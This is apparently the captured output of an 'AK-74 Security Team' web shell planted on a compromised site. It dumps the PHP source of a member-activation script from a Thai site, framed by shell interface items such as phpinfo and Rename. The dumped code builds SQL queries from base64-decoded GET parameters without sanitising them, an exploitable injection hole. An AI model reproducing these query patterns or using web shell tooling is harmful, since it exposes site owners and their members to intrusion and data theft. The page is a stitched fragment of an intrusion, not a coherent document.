.:: :[ AK-74 Security Team Web-shell ]: ::.
phpinfo()
PHP
<?php include("include/config.php"); include("include/connect.php"); include("include/function.php"); header("Content-Type: text/html; charset=utf-8"); $_GET['mid'] = base64_decode($_GET['mid']); $_GET['email'] = base64_decode($_GET['email']); $sql = " SELECT member_id, active_status FROM member WHERE member_id = '".$_GET['mid']."' AND email = '".$_GET['email']."' "; $query = sql_query($sql); if (sql_num_rows($query) > 0) { $rec = sql_fetch_array($query); if ($rec['active_status'] == 0) { $sql = " UPDATE member SET active_status = 1, activate_date = '".date("Y-m-d H:i:s")."' WHERE member_id = '".$_GET['mid']."' "; sql_query($sql); ?> <script language="javascript"> alert('ยินดีต้อนรับสู่ MSN Ladyboy\nท่านได้ทำการสมัครสมาชิก เสร็จสมบูรณ์แล้วครับ'); window.location = '/<?php echo $configMyFileFirstPage?>'; </script> <?php exit(); } else { ?> <script language="javascript"> alert('ข้อมูลของคุณถูกยืนยันการโพสท์แล้ว'); window.location = '/<?php echo $configMyFileFirstPage?>'; </script> <?php exit(); } // end if ($rec['active_status'] == 0) { } else { // if (sql_num_rows($query) > 0) { ?> <script language="javascript"> alert('ไม่พบข้อมูลของคุณ'); window.location = '/<?php echo $configMyFileFirstPage?>'; </script> <?php exit(); }// end if (sql_num_rows($query) > 0) { ?>
Rename:
-